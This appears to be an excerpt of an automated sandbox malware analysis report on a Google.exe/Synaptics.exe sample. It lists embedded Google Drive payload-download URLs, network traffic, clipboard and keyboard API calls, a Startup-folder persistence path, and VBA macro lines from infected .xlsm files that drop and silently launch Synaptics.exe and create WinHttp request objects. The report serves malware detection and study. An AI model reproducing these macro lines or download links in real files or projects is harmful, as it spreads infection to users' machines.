                            Source: Synaptics.exe, 00000007.00000002.1736596805.0000000000600000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000007.00000003.1630718381.000000000060A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloaduR
                            Source: Synaptics.exe, 0000001A.00000002.2285126784.000000000EEC3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloaduS
                            Source: Synaptics.exe, 0000001A.00000002.2248767553.00000000071A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloaduW?
                            Source: Synaptics.exe, 0000001A.00000002.2297859060.000000000F089000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadup
                            Source: Synaptics.exe, 0000001A.00000003.1883469824.0000000004C90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadurity
                            Source: Synaptics.exe, 0000001A.00000002.2241567146.0000000004CDE000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000003.1883469824.0000000004CB7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadus
                            Source: Synaptics.exe, 0000001A.00000002.2297859060.000000000F089000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloaduu
                            Source: Synaptics.exe, 00000007.00000003.1653439358.000000000546A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2241567146.0000000004D05000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2297859060.000000000F089000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2285126784.000000000EEED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadv
                            Source: Synaptics.exe, 00000007.00000002.1736596805.00000000005E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadv%K
                            Source: Synaptics.exe, 00000007.00000003.1630718381.000000000061E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000007.00000002.1736596805.0000000000634000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadv5
                            Source: Synaptics.exe, 0000001A.00000002.2248767553.00000000071A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadvk
                            Source: Synaptics.exe, 0000001A.00000002.2241567146.0000000004C65000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2241567146.0000000004C20000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2297859060.000000000F089000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadw
                            Source: Synaptics.exe, 0000001A.00000002.2241567146.0000000004CDE000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000003.1885148157.0000000004CE0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000003.1883469824.0000000004CB7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadw3
                            Source: Synaptics.exe, 0000001A.00000002.2248767553.00000000071A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadwP1$
                            Source: Synaptics.exe, 0000001A.00000002.2287110513.000000000EF88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadwnloao
                            Source: Synaptics.exe, 0000001A.00000002.2287110513.000000000EF88000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2330589183.0000000018AFE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2276507367.000000000D5FE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2316324534.0000000013EBE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2248767553.0000000007099000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2322602146.0000000015F3E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2305799683.00000000105BE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2285126784.000000000EEED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadx
                            Source: Synaptics.exe, 0000001A.00000002.2297859060.000000000F089000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2232844486.000000000076D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloady
                            Source: Synaptics.exe, 0000001A.00000002.2232844486.00000000006CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloady6
                            Source: Synaptics.exe, 00000007.00000002.1736596805.0000000000600000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000007.00000003.1630718381.000000000060A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadyS
                            Source: Synaptics.exe, 0000001A.00000002.2285126784.000000000EEC3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadym
                            Source: Synaptics.exe, 0000001A.00000002.2297859060.000000000F089000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadyrC%
                            Source: Synaptics.exe, 0000001A.00000002.2297859060.000000000F089000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadywC
                            Source: Synaptics.exe, 00000007.00000003.1653439358.000000000546A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2287110513.000000000EF88000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2241567146.0000000004CCD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2297859060.000000000F089000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2348721322.000000001D7B2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000003.1883469824.0000000004CB7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2283330221.000000000EE4D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadz
                            Source: Synaptics.exe, 0000001A.00000002.2248767553.00000000071A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadzW
                            Source: Synaptics.exe, 0000001A.00000002.2297859060.000000000F089000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadza
                            Source: Synaptics.exe, 00000007.00000003.1653439358.000000000546A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2297859060.000000000F089000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2285126784.000000000EEED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download~
                            Source: Synaptics.exe, 00000007.00000003.1630718381.000000000061E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000007.00000002.1736596805.0000000000634000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download~6
                            Source: Synaptics.exe, 0000001A.00000002.2248767553.00000000071A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download~d
                            Source: Google.exe, 00000003.00000003.1511255145.00000000022E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=downloX
                            Source: Google.exe, 00000003.00000003.1511255145.00000000022E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=downloXO
                            Source: Google.exe, 00000003.00000000.1490965770.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Synaptics.exe, 00000007.00000002.1738663182.00000000021C0000.00000004.00001000.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2239197903.0000000002140000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download
                            Source: Synaptics.exe, 00000007.00000002.1738663182.00000000021C0000.00000004.00001000.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2239197903.0000000002140000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=downloadN
                            Source: Synaptics.exe, 0000001A.00000002.2287110513.000000000EF3D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.goou0
                            Source: Synaptics.exe, 0000001A.00000002.2297859060.000000000F089000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontenI
                            Source: Synaptics.exe, 00000007.00000002.1736596805.00000000005E2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000007.00000003.1630718381.00000000005E2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2241567146.0000000004C20000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2295450672.000000000EFE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
                            Source: Synaptics.exe, 0000001A.00000002.2297859060.000000000F089000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVG
                            Source: Synaptics.exe, 0000001A.00000002.2297859060.000000000F089000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZV
                            Source: Synaptics.exe, 0000001A.00000002.2248767553.0000000007082000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2232844486.000000000076D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2348721322.000000001D7A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                            Source: Synaptics.exe, 0000001A.00000002.2232844486.0000000000722000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download-x
                            Source: Synaptics.exe, 00000007.00000002.1736596805.00000000005CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download0
                            Source: Synaptics.exe, 0000001A.00000002.2248767553.0000000007075000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download7
                            Source: Synaptics.exe, 00000007.00000002.1736596805.00000000005CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download9
                            Source: Synaptics.exe, 0000001A.00000002.2232844486.0000000000722000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download?D
                            Source: Synaptics.exe, 0000001A.00000002.2248767553.00000000071A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadE
                            Source: Synaptics.exe, 00000007.00000002.1736596805.00000000005CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadF
                            Source: Synaptics.exe, 0000001A.00000002.2248767553.0000000007075000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadG
                            Source: Synaptics.exe, 00000007.00000002.1736596805.00000000005CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadM
                            Source: Synaptics.exe, 00000007.00000002.1745653784.00000000053F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadQ
                            Source: Synaptics.exe, 0000001A.00000002.2248767553.00000000071A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadT
                            Source: Synaptics.exe, 00000007.00000002.1736596805.00000000005CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloada
                            Source: Synaptics.exe, 0000001A.00000002.2300716020.000000000F138000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadclic
                            Source: Synaptics.exe, 0000001A.00000002.2300716020.000000000F138000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcn
                            Source: Synaptics.exe, 0000001A.00000002.2248767553.00000000071A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadco
                            Source: Synaptics.exe, 00000007.00000002.1745653784.00000000053F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadn
                            Source: Synaptics.exe, 00000007.00000002.1736596805.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2248767553.00000000071A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloado
                            Source: Synaptics.exe, 00000007.00000002.1745653784.00000000053F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadplM
                            Source: Synaptics.exe, 00000007.00000002.1745653784.00000000053F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadplMg
                            Source: Synaptics.exe, 00000007.00000002.1745653784.00000000053F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadq
                            Source: Synaptics.exe, 0000001A.00000002.2248767553.00000000071A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadr
                            Source: Synaptics.exe, 00000007.00000002.1736596805.0000000000600000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadwHa
                            Source: Synaptics.exe, 00000007.00000002.1736596805.0000000000600000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadwHawHa
                            Source: Synaptics.exe, 00000007.00000002.1736596805.00000000005E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/fife.google.
                            Source: Synaptics.exe, 00000007.00000002.1736596805.00000000005E2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000007.00000003.1630718381.00000000005E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/t
                            Source: unknownHTTPS traffic detected: 142.250.185.161:443 -> 192.168.2.8:49774 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.8:49773 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.8:49775 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.8:49782 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.8:49783 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.8:49808 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.8:49806 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.8:49819 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.185.161:443 -> 192.168.2.8:49820 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.8:49821 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.185.161:443 -> 192.168.2.8:49822 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.8:49825 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.185.161:443 -> 192.168.2.8:49826 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.8:49827 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.185.161:443 -> 192.168.2.8:49828 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.8:49830 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.8:49831 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.185.161:443 -> 192.168.2.8:49846 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.8:49849 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.8:49848 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.8:49867 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.8:49869 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.8:49875 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.185.161:443 -> 192.168.2.8:49876 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.8:49878 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.185.161:443 -> 192.168.2.8:49877 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.8:49885 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.8:49886 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.185.161:443 -> 192.168.2.8:49892 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.8:49899 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.8:49900 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.8:49905 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.8:49906 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.8:49911 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.8:49914 version: TLS 1.2
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exe Code function: 4_2_00507099 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,4_2_00507099
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exe Code function: 4_2_00507294 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,4_2_00507294
                            Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe Code function: 13_2_00C97294 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,13_2_00C97294
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exe Code function: 32_2_00B17294 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,32_2_00B17294
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exe Code function: 4_2_004F4342 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput,4_2_004F4342
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exe Code function: 4_2_0051F5D0 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,4_2_0051F5D0
                            Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe Code function: 13_2_00CAF5D0 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,13_2_00CAF5D0
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exe Code function: 32_2_00B2F5D0 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,32_2_00B2F5D0

                            System Summary

                            Source: 1QGQHkIB.xlsm.7.dr OLE, VBA macro line: FN = Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe"
                            Source: 1QGQHkIB.xlsm.7.dr OLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                            Source: 1QGQHkIB.xlsm.7.dr OLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                            Source: 1QGQHkIB.xlsm.7.dr OLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                            Source: 1QGQHkIB.xlsm.7.dr OLE, VBA macro line: TMP = Environ("Temp") & "\~$cache1.exe"
                            Source: 1QGQHkIB.xlsm.7.dr OLE, VBA macro line: If FSO.FileExists(Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe") Then
                            Source: 1QGQHkIB.xlsm.7.dr OLE, VBA macro line: Shell Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe", vbHide
                            Source: 1QGQHkIB.xlsm.7.dr OLE, VBA macro line: ElseIf FSO.FileExists(Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe") Then
                            Source: 1QGQHkIB.xlsm.7.dr OLE, VBA macro line: Shell Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe", vbHide
                            Source: 1QGQHkIB.xlsm.7.dr OLE, VBA macro line: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5.1")
                            Source: 1QGQHkIB.xlsm.7.dr OLE, VBA macro line: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5")
                            Source: NEBFQQYWPS.xlsm.7.dr OLE, VBA macro line: FN = Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe"
                            Source: NEBFQQYWPS.xlsm.7.dr OLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                            Source: NEBFQQYWPS.xlsm.7.dr OLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                            Source: NEBFQQYWPS.xlsm.7.dr OLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                            Source: NEBFQQYWPS.xlsm.7.dr OLE, VBA macro line: TMP = Environ("Temp") & "\~$cache1.exe"
                            Source: NEBFQQYWPS.xlsm.7.dr OLE, VBA macro line: If FSO.FileExists(Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe") Then
                            Source: NEBFQQYWPS.xlsm.7.dr OLE, VBA macro line: Shell Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe", vbHide
                            Source: NEBFQQYWPS.xlsm.7.dr OLE, VBA macro line: ElseIf FSO.FileExists(Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe") Then
                            Source: NEBFQQYWPS.xlsm.7.dr OLE, VBA macro line: Shell Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe", vbHide
                            Source: NEBFQQYWPS.xlsm.7.dr OLE, VBA macro line: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5.1")
                            Source: NEBFQQYWPS.xlsm.7.dr OLE, VBA macro line: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5")
                            Source: YDcMLELS.xlsm.26.dr OLE, VBA macro line: FN = Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe"
                            Source: YDcMLELS.xlsm.26.dr OLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                            Source: YDcMLELS.xlsm.26.dr OLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                            Source: YDcMLELS.xlsm.26.dr OLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                            Source: YDcMLELS.xlsm.26.dr OLE, VBA macro line: TMP = Environ("Temp") & "\~$cache1.exe"
